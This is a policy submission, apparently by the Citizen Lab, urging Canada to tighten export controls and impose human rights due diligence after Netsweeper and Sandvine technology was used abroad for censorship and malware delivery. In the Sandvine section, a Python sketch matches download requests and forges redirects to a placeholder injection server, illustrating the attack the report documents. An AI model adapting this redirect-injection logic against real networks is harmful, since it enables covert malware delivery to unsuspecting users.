
Submission to the Government of Canada on the Renewal of the Responsible Business Conduct Strategy

Introduction 

On 18 September 2020, the Government of Canada opened a public consultation on the renewal of its Responsible Business Conduct (RBC) strategy, which is intended to provide guidance to the Government of Canada and Canadian companies active abroad with respect to their business activities. The following submission from the Citizen Lab addresses Canadian technology companies and the threat they pose to human rights abroad. The submission proceeds as follows. First, we describe the research that the Citizen Lab has conducted at the intersection of technology and human rights. Second, we describe two case studies involving companies with a Canadian business presence, Sandvine and Netsweeper, whose technology has been used to violate human rights abroad. Third, we suggest mechanisms the Government of Canada’s RBC strategy can adopt to address the harmful impacts of Canadian-made technology abroad.

The Negative Impact of Technology on Human Rights 

The Citizen Lab is an interdisciplinary laboratory based at the Munk School of Global Affairs & Public Policy, University of Toronto, focusing on research, development, and high-level strategic policy and legal engagement at the intersection of information and communication technologies, human rights, and global security.

Researchers at the Citizen Lab use a “mixed methods” approach to research, combining practices from political science, law, computer science, and area studies. The Citizen Lab’s research includes investigating digital espionage against civil society, documenting Internet filtering and other technologies and practices that impact freedom of expression online, analyzing privacy, security, and information controls of popular applications, and examining transparency and accountability mechanisms relevant to the relationship between corporations and state agencies regarding personal data and other surveillance activities. 

The Citizen Lab’s research over nearly two decades has consistently shown that technology has a fundamental impact on internationally-protected human rights, including the right to privacy, freedom of expression, the right to life, liberty and security of the person, protection against discrimination, and other rights. For example, the Citizen Lab’s research into dual-use technologies has demonstrated how network traffic management technology (e.g., deep packet inspection and content filtering) and device intrusion tools for targeted monitoring (e.g., spyware) can be deployed in ways that seriously impair human rights. The Citizen Lab has also conducted research into emerging technologies and their impact on human rights, in particular on automated decision-making and artificial intelligence systems and the human rights harms that flow from the use of such technology. This research shows that the human rights impacts of automated decision-making in immigration and refugee law in Canada are far-reaching. Research by the Citizen Lab examining algorithmic technologies designed for use by law enforcement in Canada also reveals the broad and troubling impact of the use of these technologies on the rights to privacy, freedom of expression, peaceful assembly and association, equality and freedom from discrimination, as well as the rights to liberty and freedom from arbitrary detention.

In short, the Citizen Lab’s research over nearly two decades demonstrates that technology can have a serious and negative impact on human rights, both in Canada and abroad. In this next section, we discuss in more depth two case studies where companies with strong ties to Canada and a corporate presence in this country have manufactured and exported technology that has facilitated human rights violations. They demonstrate that the Government of Canada has provided material support for firms whose products restrict human rights abroad, and that reform is needed to ensure corporate compliance and respect for international human rights law. 

Two Canadian Case Studies: Sandvine and Netsweeper

The Citizen Lab has conducted research into two companies with strong corporate ties in Canada and whose exported technology has been used to violate human rights abroad. In this section, we describe the companies at issue, the type of technology exported, and how the technology has been used to abuse and infringe human rights. These two case studies show that current Canadian laws and policies regarding the sale of technology manufactured and developed in Canada and sold abroad do not sufficiently prevent human rights abuses. In the final section of this submission, we set forth recommendations on reforms that the Government of Canada should implement as part of the renewal of the RBC strategy.

Netsweeper’s Internet-Filtering Technology

Netsweeper Inc. is one of many Canada-based technology companies situated along the Toronto-Waterloo Innovation Corridor. The company sells a suite of technology products related to Internet categorization and filtering that enable administrators to restrict Internet users’ access to websites. It markets these products as tools that allow librarians to block pornography, schools to enable safe search options on platforms like Google, and workplaces to block social media sites and combat lost productivity. The company has received material support from the Governments of Canada and Ontario. For example, it was awarded research grants from the National Research Council in 2009 and 2012. It has been described as a “success story” by the Government of Ontario, which also provided support through its Export Market Access program. Netsweeper has also been included in international trade promotion facilitated by the Government of Canada, and, in 2016, Export Development Canada provided a guarantee to facilitate the financing of a sale of the company’s technology to Bahrain.

While Netsweeper’s products may seem innocuous, technical research shows that they are systematically used for purposes the company does not advertise. In 2018, the Citizen Lab released a report documenting Netsweeper installations on public IP networks in ten countries that each presented widespread human rights concerns. This research revealed that Netsweeper technology was used to block: (1) political content, including websites linked to political and opposition groups, local and foreign news, and regional human rights issues in Bahrain, Kuwait, Yemen, and the UAE; (2) LGBTQ content as a result of Netsweeper’s pre-defined ‘Alternative Lifestyles’ content category, as well as Google searches for keywords relating to LGBTQ content (e.g., the words “gay” or “lesbian”) in the UAE, Bahrain, and Yemen; (3) non-pornographic websites, including those of the World Health Organization and the Center for Health and Gender Equity, which were mis-categorized as “pornography”; (4) news reporting on the Rohingya refugee crisis and violence against Muslims from multiple news outlets for users in India; (5) Blogspot-hosted websites in Kuwait, by categorizing them as “viruses,” as well as a range of political content from local and foreign news and a website that monitors human rights issues in the region; and (6) websites like Date.com, Gay.com (the Los Angeles LGBT Center), Feminist.org, and others, by categorizing them as “web proxies.”
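To make the mechanism concrete, the following minimal sketch models how category-based filtering of this kind can overblock lawful content. The category names echo those discussed above, but the database entries, hostnames, policy, and matching logic are hypothetical illustrations, not a reconstruction of Netsweeper’s product.

```python
# Purely illustrative sketch of category-based URL filtering.
# Entries and policy below are hypothetical; only the category names
# echo those discussed in the report.

# A vendor-maintained mapping from hostname to content category.
CATEGORY_DB = {
    "example-lgbtq-news.org": "Alternative Lifestyles",  # broad pre-defined category
    "who.int": "Pornography",                  # mis-categorization of a health site
    "example-health-ngo.org": "Pornography",   # mis-categorization
    "example-circumvention.net": "Web Proxies",
    "example-local-news.com": "News",
}

# A deployment's policy is simply the set of categories an administrator
# (or a national ISP) chooses to block.
BLOCKED_CATEGORIES = {"Alternative Lifestyles", "Pornography", "Web Proxies"}


def decide(host: str) -> str:
    """Return 'BLOCK' or 'ALLOW' for a requested hostname."""
    category = CATEGORY_DB.get(host, "Uncategorized")
    return "BLOCK" if category in BLOCKED_CATEGORIES else "ALLOW"


if __name__ == "__main__":
    for host in sorted(CATEGORY_DB):
        print(f"{host:28} {CATEGORY_DB[host]:22} {decide(host)}")
```

The point of the sketch is that a single mis-categorization, or a subscription to an overly broad pre-defined category, silently blocks lawful expression on every network that applies the same database and policy.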

Furthermore, in 2015, the Citizen Lab released a report documenting how Netsweeper technology was used to block Internet content during the armed conflict in Yemen, following the dictates of the Houthis, a Yemeni rebel group. Content filtering in this case extended to a wide variety of political content and the entire .il (Israel) domain. As access to information is critical in any context, and particularly during an armed conflict in which civilians rely on the Internet for news to stay safe and communicate, this represented a particularly serious human rights abuse.

As noted by the Citizen Lab and other organizations, this use of Netsweeper’s technology has threatened a number of internationally-protected human rights, including the right to freedom of opinion and expression, the freedom to seek, receive, and impart information and ideas, protections against discrimination, minority protection, and the rights to liberty and security of the person. International human rights institutions have taken a similarly critical view of Internet-filtering technology. For example, in General Comment No. 34, the United Nations (UN) Human Rights Committee noted that article 19 of the International Covenant on Civil and Political Rights (ICCPR) protects all forms of expression, including “electronic and internet-based modes of expression.” In his 2011 report, the UN Special Rapporteur on the promotion and protection of the right to freedom of opinion and expression, Frank La Rue, described how “blocking and filtering” represented one “restriction on the right of individuals to express themselves through the Internet” and noted that “States’ use of blocking or filtering technologies is frequently in violation of their obligation to guarantee the right to freedom of expression” under international human rights law. A number of other regional and international human rights instruments have declared that freedom of expression applies to the Internet and that “[m]andatory blocking of entire websites, IP addresses, ports, network protocols or types of uses (such as social networking) is an extreme measure” that can “only be justified in accordance with international standards.” Further, content filtering systems “which are not end-user controlled are a form of prior censorship and are not justifiable as a restriction on freedom of expression.” In short, the use of Netsweeper technology by importing countries to filter and block websites and content violates internationally-protected human rights.

Sandvine’s Deep Packet Inspection Technology

Sandvine is a US-based technology company that produces networking equipment primarily used by large Internet service providers (ISPs). Originally founded in Waterloo, Ontario in 2001, the company was purchased in 2017 by US-based private equity firm Francisco Partners and merged with Procera Networks into a combined entity named Sandvine. The company maintains offices in Waterloo and a number of other locations around the world. It sells a suite of networking devices, including deep packet inspection (DPI) technology. While DPI is used by ISPs for innocuous purposes like traffic management, the same technology can be used to block access to websites or to inject malicious traffic targeting specific users or content.

In 2018, the Citizen Lab released a report documenting the use of Sandvine/Procera devices to redirect users in Turkey and Syria to spyware, as well as the use of such devices to hijack Internet users’ connections in Egypt, redirecting them to revenue-generating content. These examples highlight some of the ways in which this technology can be used for malicious purposes. The report revealed how Citizen Lab researchers identified a series of devices on the networks of Türk Telekom—a large and previously state-owned ISP in Turkey—being used to redirect requests from users in Turkey and Syria who attempted to download certain common Windows applications like antivirus software and web browsers. Through the use of Sandvine/Procera technology, these users were instead redirected to versions of those applications that contained hidden malware.
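To illustrate the redirection mechanism described above, the sketch below shows, in highly simplified form, how an in-path device capable of reading plaintext HTTP traffic could match requests for particular application downloads and answer them with a spoofed redirect to a server controlled by the operator. All hostnames, paths, and logic are hypothetical; this is an illustration of the general technique documented in the report, not of Sandvine’s or any other vendor’s implementation.

```python
# Illustrative sketch only: matching a plaintext HTTP download request and
# constructing a spoofed redirect response. Hostnames and paths are hypothetical.

TARGETED_DOWNLOADS = {
    # (host, path prefix) pairs the operator wants to intercept
    ("download.example-av.com", "/installer"),
    ("www.example-browser.org", "/release"),
}

INJECTION_SERVER = "http://updates.example-injected.net"  # hypothetical


def parse_http_request(raw: bytes) -> tuple[str, str] | None:
    """Extract (Host, path) from a plaintext HTTP/1.1 request, if possible."""
    try:
        head = raw.decode("latin-1").split("\r\n\r\n", 1)[0]
        lines = head.split("\r\n")
        _method, path, _version = lines[0].split(" ", 2)
        headers = dict(line.split(": ", 1) for line in lines[1:] if ": " in line)
        return headers.get("Host", ""), path
    except (ValueError, IndexError):
        return None


def maybe_inject(raw_request: bytes) -> bytes | None:
    """Return a spoofed redirect if the request matches a targeted download."""
    parsed = parse_http_request(raw_request)
    if parsed is None:
        return None
    host, path = parsed
    for target_host, prefix in TARGETED_DOWNLOADS:
        if host == target_host and path.startswith(prefix):
            return (
                "HTTP/1.1 307 Temporary Redirect\r\n"
                f"Location: {INJECTION_SERVER}{path}\r\n"
                "Connection: close\r\n\r\n"
            ).encode()
    return None  # pass the request through untouched


if __name__ == "__main__":
    request = (
        b"GET /installer/setup.exe HTTP/1.1\r\n"
        b"Host: download.example-av.com\r\n\r\n"
    )
    print((maybe_inject(request) or b"(no injection)").decode())
```

In an in-path deployment, a spoofed response of this kind can simply be returned in place of the legitimate server’s reply, so the user’s browser follows the redirect and the substitution is not visible to the user. Interception of this kind depends on the request travelling over unencrypted HTTP, since the device must be able to read and answer it in plaintext.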

Citizen Lab researchers also found that middleboxes were being used on the networks of dozens of ISPs across Egypt to redirect users to affiliate ads and cryptocurrency mining scripts, both of which were likely being used to generate illicit revenue. After an extensive technical investigation that included purchasing a second-hand device, researchers found that the unique characteristics of the middleboxes used in both Turkey and Egypt matched those of Sandvine’s PacketLogic devices. They also identified devices matching these characteristics in both countries that were being used to block access to websites, including political, media, and human rights content.

In August 2020, media reporting also suggested that technology made by Sandvine was being used to block access to websites in Belarus, following nationwide protests over the country’s disputed presidential election. Reporting indicated that widespread outages, lasting days, included the inability to access Facebook, Twitter, YouTube, and Google. While representatives of Sandvine initially pointed to the company’s corporate ethics policy in response, media reports revealed that Sandvine’s CTO had privately acknowledged that the company’s technology was being used in Belarus, while claiming that access to the Internet was not “a part of human rights.” Sandvine’s owner, Francisco Partners, nonetheless later cancelled the contract with Belarus, stating that the use of its tools to block access to websites “is a human rights violation.”

Sandvine’s DPI technology has thus been used to infringe a number of internationally-protected human rights. The deleterious human rights impacts of DPI systems, as well as Internet-filtering technology, have been detailed by the UN Special Rapporteur on the promotion and protection of the right to freedom of opinion and expression, David Kaye, in multiple reports to the UN. In his 2017 report to the UN Human Rights Council, the Special Rapporteur addressed the role played by private actors that provide Internet and telecommunications services. He observed that the “multiple uses” of network equipment and technology raised freedom of expression and privacy concerns. For example, DPI technologies, which can sometimes be used for innocuous purposes, “have also been employed to filter Internet content, intercept communications and throttle data flows.” As the Special Rapporteur stated, the improper use of DPI and Internet-filtering technologies to mediate publicly-available Internet access by states poses a significant threat to human rights when that filtering is applied covertly, arbitrarily, without due process, or without regard for legitimate forms of expression.

Further, technologies like DPI and Internet filtering also impact the right to privacy (protected under article 17 of the ICCPR). While restrictions on the right to privacy are sometimes permissible, such restrictions are subject to strict requirements of legality, necessity, and proportionality under international law. Moreover, given that targeted surveillance disproportionately impacts vulnerable groups, including racial, religious, ethnic, gender, and sexual minorities, state surveillance practices may also violate international human rights prohibitions on discrimination and protections for minority rights (protected under articles 26 and 27 of the ICCPR) and may infringe upon other rights, such as the rights to liberty and security of the person (protected under article 9 of the ICCPR).

Recommendations for the Government of Canada

These two case studies underline the need for more robust action to ensure that technology manufactured in Canada is not used abroad to undermine or violate internationally-protected rights. The renewal of the RBC strategy provides an opportunity for such reform. As the Government of Canada noted in its call for submissions, companies have a duty to respect human rights, and the state has a duty to protect these same rights. More concrete and legally enforceable steps must be taken by the Government of Canada to ensure that both of these principles, as articulated in the UN Guiding Principles on Business and Human Rights, are fulfilled. While corporate social responsibility and other soft law norms have been useful in moving states and companies towards more robust human rights protections and in developing substantive legal norms in this area, it is time for the Government of Canada to take the next logical step by reforming export control law and imposing legally-binding requirements on businesses and governments to conduct adequate human rights due diligence before technologies are sold abroad.

Reforming Canadian Export Law 

Some progress has been made in integrating human rights requirements into Canadian export controls. In particular, the Government of Canada’s accession to the Arms Trade Treaty ushered in new human rights considerations. Under section 7.3(1) of the Export and Import Permits Act (EIPA), the Minister, in respect of arms, ammunition, implements, or munitions of war, must consider whether the goods or technology subject to export control “could be used to commit or facilitate … a serious violation of international human rights law” (among other grounds). Further, under section 7.4 of the EIPA, the Minister “shall not” issue an export permit in respect of arms, ammunition, implements, or munitions of war if the Minister concludes that there is a “substantial risk” that the technology being exported would lead to serious violations of international human rights law. While the text of the EIPA suggests that technology that does not qualify as “arms, ammunition, implements or munitions of war” may be excluded from this mandatory human rights assessment, the Government of Canada’s own guidance suggests that such considerations apply more broadly to all exports. As a preliminary step, we recommend issuing a directive clarifying that any technology subject to export control must be assessed for its human rights impacts before an export permit is issued.

Further, while the amendments brought by accession to the Arms Trade Treaty are helpful, they do not go far enough when it comes to Canadian-made and Canadian-developed technology that could threaten human rights abroad. The considerations described above apply only when an export is already subject to export control, i.e., goods or technology already on the EIPA’s Area Control List or Export Control List. Netsweeper’s Internet-filtering technology provides a helpful example of why this framework is insufficient. Since Internet-filtering technology is not on the Export Control List, Netsweeper can sell the technology abroad without an export permit and without any evaluation of the human rights risks posed by the technology.

As recommended by the Senate Standing Committee on Human Rights in 2018, one remedy for this legislative gap is to include consideration of the negative human rights consequences of a technology as a basis for the Government of Canada to implement export control under section 3(1) of the EIPA and place the good on the Export Control List. More specifically, and as the Committee recommended two years ago, the EIPA should be updated to ensure that Canadian technology exports are subject to export control (e.g., placed on the Export Control List) whenever there is a substantial risk that the export could be used to commit or facilitate a serious human rights violation. As noted by the Committee, the analysis of whether there will be this kind of negative human rights impact requires an examination of the intended use of the technology rather than a neutral evaluation of the technology itself. This is because so-called ‘dual-use’ technology may simultaneously have legitimate and socially beneficial functions and the potential for abuse, censorship, or other human rights violations. In order to ensure appropriate controls over such exports, the EIPA could be amended to include a ‘catch-all’ scheme similar to that being debated in the European Union. This ‘catch-all’ language could require export authorisation for non-listed cyber-surveillance technology where there is evidence that the end-use “may be in connection with internal repression and/or the commission of serious violations of international human rights and international humanitarian law.”

Mandatory Human Rights Due Diligence

In conjunction with these recommended updates to the EIPA, mandatory due diligence requirements for corporate actors who intend to export goods or technology abroad would provide another mechanism to ensure greater respect for and protection of human rights. 

Human rights due diligence obligations are becoming a global norm. In 2017, France adopted its duty of vigilance law, which requires all transnational businesses over a certain size to establish and implement a due diligence process for monitoring severe human rights violations that arise directly or indirectly from their operations. The Swiss government has been considering a law similar to the French model, German civil society has launched a campaign for human rights and environmental due diligence legislation, and the Finnish government has also committed to exploring mandatory human rights due diligence laws. In April 2020, the European Commissioner for Justice announced the European Commission’s commitment to introducing rules for mandatory corporate environmental and human rights due diligence as well. In July 2020, the European Commission published an Inception Impact Assessment for sustainable corporate governance and sought public feedback on further action in this area. Other laws, such as the US Dodd-Frank Act’s due diligence requirements for conflict minerals or the Dutch Child Labour Due Diligence Law proposal, adopt human rights due diligence in specific commercial spheres.

At the international level, the UN Intergovernmental Working Group on Transnational Corporations and Other Business Enterprises With Respect to Human Rights (IGWG) continues to work towards a binding international treaty on business and human rights. In August 2020, the IGWG released the Second Revised Draft of the proposed treaty, article 6.2 of which requires States to adopt legislation requiring “business enterprises … to undertake human rights due diligence proportionate to their size, risks of severe human rights impacts and the nature and context of their operations.” The Second Revised Draft also outlines four explicit duties that such legislation must impose on businesses. Failure to comply with these duties, according to article 6.6, results in sanctions that are “without prejudice to the provisions on criminal, civil and administrative liability.” Additionally, articles 7 to 11 require states to remove remedial barriers faced by victims of human rights abuses committed by private actors. Other notable aspects of the Second Revised Draft include the incorporation of environmental issues within the definition of human rights abuses, corporate exposure to liability for acts committed throughout the entity’s supply chain, the preclusion of defences in civil cases based on forum non conveniens, and a requirement that states adopt legislation providing for corporate criminal liability “for human rights abuses that amount to criminal offences under international human rights law.” Although Canada has been relatively silent in the drafting process, we recommend that Canada put its support behind the proposed treaty when the IGWG convenes for its Sixth Session from 26 to 30 October 2020.

While the nature and content of human rights due diligence laws differ across jurisdictions, the minimum requirements of such a law could look similar to what is required under the French duty of vigilance law. At a minimum, these should include: risk-mapping of the potential human rights risks raised by the technology under review; the development of appropriate whistleblowing mechanisms; the identification of actions to prevent and mitigate negative human rights impacts; an alert mechanism to assess and identify human rights risks before and after export; and the development of a monitoring and public reporting scheme. Further, the US Department of State recently released guidelines on the implementation of the UN Guiding Principles on Business and Human Rights for transactions linked to foreign government end-users for products or services with surveillance capabilities. The US guidelines describe in detail the components of effective due diligence and identify specific red flags and concerns related to companies that produce surveillance technologies. These guidelines should also inform binding legislation in Canada.

The Government of Canada could rely, in part, on corporate identification and publication of human rights risks identified through this due diligence process to update the Export Control List. Such reporting could also be used by the government to determine whether a product falls within the proposed ‘catch-all’ provision and should be subject to export control. Further, any due diligence law should impose a framework of statutory liability for business actors that fail to conduct human rights due diligence or fail to do so with the appropriate standard of care. 

Expand and Strengthen the Canadian Ombudsperson for Responsible Enterprise (CORE)

Ensuring that civil society and victims of corporate abuses can seek redress for human rights violations will also be critical to the proper functioning of the EIPA and mandatory human rights due diligence. 

The Office of the Canadian Ombudsperson for Responsible Enterprise (CORE) could play an essential role on this count by receiving and proactively investigating complaints about technology companies accused of violating human rights abroad, and taking steps to ensure accountability. However, the CORE is presently only focused on human rights issues arising from Canadian garment, mining, and oil and gas companies operating abroad, and lacks powers to compel companies and their executives to provide testimony, information, and documents in the course of its fact-finding investigations. The CORE also lacks sufficient powers to impose penalties and other accountability measures in response to its findings. Instead, its current mandate only includes the capacity to offer vague and undefined “informal mediation services” and to make recommendations or provide referrals to other governmental agencies. Furthermore, the CORE’s budget is plainly insufficient for it to successfully carry out its mandate, providing funding for only four full-time staff.

We recommend that the Government of Canada strengthen the CORE, expand its mandate, and empower it to hold Canadian companies meaningfully accountable for abuses committed abroad. First, the CORE should immediately be given jurisdiction to tackle human rights issues associated with the technology sector beyond the garment, mining, and oil and gas sectors and its budget should be increased accordingly to reflect this new mandate. Second, the CORE’s investigatory and accountability powers should be expanded to include a capacity to impose penalties and mandatory production orders, as well as new statutory remedies for victims of human rights abuses committed by corporations and for circumstances where corporations fail to comply with mandatory human rights due diligence obligations. 

Conclusion

In this brief, the Citizen Lab has put forward a number of recommendations regarding the renewal of the RBC strategy by the Government of Canada with respect to Canadian technology that threatens human rights abroad. We summarize these recommendations here:

Reform Canadian export law:  

  1. Clarify that all Canadian exports are subject to the mandatory analysis set out in sections 7.3(1) and 7.4 of the EIPA.
  2. Amend section 3(1) of the EIPA such that the human rights risks of an exported good or technology provide an explicit basis for export control.
  3. Amend the EIPA to include a ‘catch-all’ provision that subjects cyber-surveillance technology to export control, even if not listed on the Export Control List, when there is evidence that the end-use may be connected with internal repression and/or the commission of serious violations of international human rights or international humanitarian law. 

Implement mandatory human rights due diligence legislation:

  1. Similar to the French duty of vigilance law, impose a human rights due diligence requirement on businesses such that they are required to perform human rights risk assessments, develop mitigation strategies, implement an alert system, and develop a monitoring and public reporting scheme. 
  2. Ensure that the mandatory human rights due diligence legislation provides a statutory mechanism for liability where a company fails to conform with the requirements under the law. 

Expand and strengthen the CORE: 

  1. Expand the CORE’s mandate to cover technology sector businesses operating abroad.
  2. Expand the CORE’s investigatory mandate to include the power to compel companies and executives to produce testimony, documents, and other information for the purposes of joint and independent fact-finding.
  3. Strengthen the CORE’s powers to hold companies to account for human rights violations abroad, including the power to impose fines and penalties and to impose mandatory orders.
  4. Expand the CORE’s mandate to assist victims in obtaining legal redress for human rights abuses. This could include the CORE helping to enforce mandatory human rights due diligence requirements and imposing penalties and/or applying additional statutory mechanisms for redress when those requirements are violated.
  5. Increase the CORE’s budgetary allocations to ensure that it can carry out its mandate.

Acknowledgements 

We would also like to thank Miles Kenyon (Communications Specialist, Citizen Lab) for his support in reviewing this submission.